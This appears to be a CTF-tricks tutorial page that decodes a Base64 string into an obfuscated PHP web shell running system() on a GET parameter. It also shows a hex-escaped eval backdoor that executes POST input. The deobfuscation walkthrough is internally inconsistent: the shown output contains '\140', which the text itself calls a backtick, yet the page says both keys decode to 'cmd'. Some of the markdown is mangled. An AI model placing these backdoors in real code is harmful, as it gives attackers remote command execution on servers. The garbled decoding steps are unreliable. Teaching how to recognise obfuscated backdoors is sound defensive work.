> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-3/obfuscation/multi-stage-decoding/trick-0294.md).

# Decode Obfuscated Code (Base64)

***

Decode Base64 encoded strings found obfuscated within source code or other data.

Given the string:

```
CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=
```

Decode it using base64:

```bash
echo "CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA=" | base64 -d
```

This results in:

```
 if (isset($_GET['\143\155\x64'])) { system($_GET['\143\x6d\140']); }
```

The resulting string uses octal (`\143`, `\155`, `\140`) and hexadecimal (`\x64`, `\x6d`) escapes to further obfuscate the code. These escape sequences decode to ASCII characters. For instance, `\143` (octal) is 'c', `\155` (octal) is 'm', and `\x64` (hexadecimal) is 'd'. Similarly, `\x6d` (hexadecimal) is 'm' and `\140` (octal) is '`'. Combining these, the strings inside the` $\_GET`accesses both decode to`cmd\`.

The final, deobfuscated PHP code is:

```php
 if (isset($_GET['cmd'])) { system($_GET['cmd']); }
```

This is a common pattern for simple backdoors, allowing execution of arbitrary commands via a GET parameter.

PHP code can be obfuscated using various techniques beyond Base64, including hexadecimal and octal encoding of strings and function names. For example, the string "eval" could be represented using hexadecimal escapes:

```php
$x = "\x65\x76\x61\x6c";
$x($_POST['c']);
```

This code assigns the string "eval" to the variable `$x` using hex escapes and then executes the content of `$_POST['c']` using the variable function `$x`. Such methods make static analysis more difficult.
